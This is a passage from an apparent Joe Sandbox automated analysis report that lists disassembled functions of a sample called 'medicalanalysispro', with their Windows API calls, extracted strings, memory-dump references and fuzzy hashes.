                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9310A76A29602C6F710AB20A85577AB660FB85785FC04135D90E4AF9ADF7DB0258B30
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A772C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A114C: _vsnprintf.MSVCRT ref: 00007FF7600A1189
                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A7763
                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A7772
                                                                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A77B8
                                                                                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A77EC
                                                                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A7805
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                                                                                                                                                                                                                • Instruction ID: 604f412cf993ca30e47354f2bf4e560652d5d170c573664e5b00d79db8830b2e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24315432A08A41C6EB10AB25A800179FBA1FF89B50FD58635DA5E07B9DCF3DF555C720
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A5050 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3370778649-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                                                                                                                                                                                                                • Instruction ID: 748e7794fc4a7a0b37514e587923f8900dd284c12e5aacb0a4a365ac1cb94fd1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE111A65708B81C7EB146B62A444179FAA0FB4EFC1F899138DD0E47B59DE3DE4518720
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A2244 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                                                                                • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                                                                                                                                                                                                                • Instruction ID: 067ef070ba51e3318f8908a8a3c3d520b70a24a62c5f8e6e1e1a83ea4b71c32d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35112C32B04A81D7E720AB25E8543AAB6A1FBCD704F858131DA4E46B59DF3CE519CB20
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A3840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                                                                                                                                                                                                                • String ID: ham
                                                                                                                                                                                                                                                                                                                • API String ID: 761066910-4133487753
                                                                                                                                                                                                                                                                                                                • Opcode ID: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                                                                                                                                                                                                                                                                                                • Instruction ID: ef6636fe7d816f08639b63f978e03057ba655a8e369a5061b6fc17d38de0924d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8110060E08742C6F7597B65A4092B8EA51EB8EB41FD49131E90E06B9ECF3DB464C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A494C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5078
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5089
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50AF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LoadResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50C0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LockResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50CF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: memcpy_s.MSVCRT ref: 00007FF7600A50EE
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FreeResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50FD
                                                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7600A3388), ref: 00007FF7600A4975
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7600A3388), ref: 00007FF7600A4A11
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: LoadStringA.USER32 ref: 00007FF7600A4E60
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: MessageBoxA.USER32 ref: 00007FF7600A4EA0
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: <None>$@$FINISHMSG
                                                                                                                                                                                                                                                                                                                • API String ID: 3507850446-4126004490
                                                                                                                                                                                                                                                                                                                • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5756ec1b9e04482ca79f15c37681682b5188e0d3834e13bd5ec6544e5515a47d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04118776B08642C7F7206B20E45177AF650FBC5794F849135DA4D46F8ADF3DE1148B24
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A79F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 438848745-2381869747
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9a78da8f3990f46e530d2cbd78e241856d8708331746d34e3224425745eab655
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23115131A19682D6EA61AB10D8503FDB7A0FB99704FC45271C65D02BAADF3DF629C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A1500 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                                                                                                                                                                                                                                                                                                • Instruction ID: bfdafb32c5531b09a0935db4eac531031d3d61c359196b9d3bb79a2a49ca4f22
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73116321E08A85C6EA506B24F4053B9E7A1FBC9B64F854231CA5E06BDACF3CE0558770
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A3BF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                                                                                                                                                                                                                                                                • String ID: ham
                                                                                                                                                                                                                                                                                                                • API String ID: 2312377310-4133487753
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                                                                                                                                                                                                                • Instruction ID: 19a4bb571d5c8638aceaf27fed34134be490c8bab0b1dd5c56c159058ebb7d95
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2A18132E19142CAF760AB11944467AF6A4FF48794F950136F91D87B8ACE3DF865C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A78B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                                • API String ID: 1065093856-1193786559
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0c7d77939b12b4c7634cbca92f258d78c34914e52935e980677bfed8138accd9
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5319E72718681C6EB519F10E8407AAF760FB89B94F844235DA9D47B9ACF7CE418CB20
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A5C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: *MEMCAB
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3211172518
                                                                                                                                                                                                                                                                                                                • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                                                                                                                                                                                                                • Instruction ID: cedf43757c468f77ee238b19ff8429e7b12abbdcd5e02b258de1e2833829f69b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2315E39A18B42C5EB20AB21E4483B9B7A0FB48791FC44236D95D42B9ADF3CF465C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A8470 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                                                                                                                                                                                                                • Instruction ID: 15a032216d3cdf934d485a5bb2a412849c9eebd67e5f280100df0141334ab3ff
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A41D435A08B42C1EB10AB18F890765B3A4FB88784F914536DA8D83B6ADF7DF565C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A7AC8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
                                                                                                                                                                                                                                                                                                                • Instruction ID: c12f3b00987c1980450369be3e6c80004d92ecffd9b0b1300f4095b8001c5c65
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC114F71A18B41C6EA109B11A84026AFA60FB89FE0F888734DE5D07FD9DF3CE4508B20
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A7C40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
